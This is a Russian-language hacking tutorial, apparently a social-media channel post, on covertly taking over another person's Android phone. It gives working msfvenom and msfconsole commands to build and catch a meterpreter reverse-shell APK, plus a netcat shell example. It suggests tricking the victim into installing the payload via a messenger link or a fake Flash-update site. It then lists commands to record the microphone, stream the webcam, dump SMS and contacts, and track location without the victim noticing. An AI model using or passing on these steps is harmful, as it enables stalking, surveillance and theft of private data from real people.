Как получить доступ к чужому телефону на Android?

Часть материала будет предоставлена в форме мануала с пошаговыми действиями, а часть – для философских раздумий и интерпретаций. Все зависит от ваших целей, знаний и подкованности жертвы. Если у вас нет доступа к конкретному смартфону, то нужно будет пофантазировать с социальной инженерией😉

Принцип работы

Простыми словами, сначала мы создадим приложение (payload), потом определенным образом доставим его жертве, а в конце у нас будет сессия meterpreter.

Все операции выполняются с помощью утилит на базе операционной системы Kali Linux.

Принцип работы проще всего понять на примере двух окон терминала. Представим, что это жертва и хакер. Последний запускает в себя команду в терминале:

nc -l -p 8577

Жертва в свою очередь подключается к этому открытому порту:

nc 192.168.1.1 8577 -e /bin/bash

Таким образом, произошло подключение к открытому порту. Теперь в первом терминале можно запустить несколько команд, которые можно использовать на машине жертвы.

Вот по такому принципу мы и будем работать.

Создание payload

Открываем терминал и с помощью нижеприведенного набора создаем приложение с расширением ".apk", которое будет доступно в корневой директории. Вместо звездочки нужно указать свой IP. Можно быстро посмотреть в терминале с помощью команды ifconfig:

msfvenom -p android/meterpreter/reverse_tcp LHOST=* LPORT=4444 R >shelll.apk

После выполнения команды в корневой директории будет создан файл shelll.apk:

Далее необходимо запустить msfconsole.

msfconsole

После этого последовательно выполняем все команды:

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set LHOST ВашIP

set LPORT 4444

exploit

После этого жертва должна скачать и запустить наше приложение. Как это сделать – это уже философский вопрос. Можно отправить ссылку в мессенджер. Можно, как вариант, сделать сайт с заглушкой под обновление Flash-плеера. Таким образом, пользователь зайдет и начнет скачивать обновление.

После этого будет установлена сессия удаленного управления.

Полезные команды:

record_mic

webcam_snap

webcam_stream

dump_contacts

dump_sms

geolocate

Базовых знаний английского будет достаточно, чтобы понять, для чего эти команды. Не будем расписывать...

После установки сессии на телефоне не происходит никаких действий. Можно спокойно удаленно следить за жертвой, если у нее будет активное интернет соединение. 

The Dark Side – Выбери правильную сторону своего разума!

На Завод 🏭 – Подпишись, если не хочешь пропустить годноту по заработку.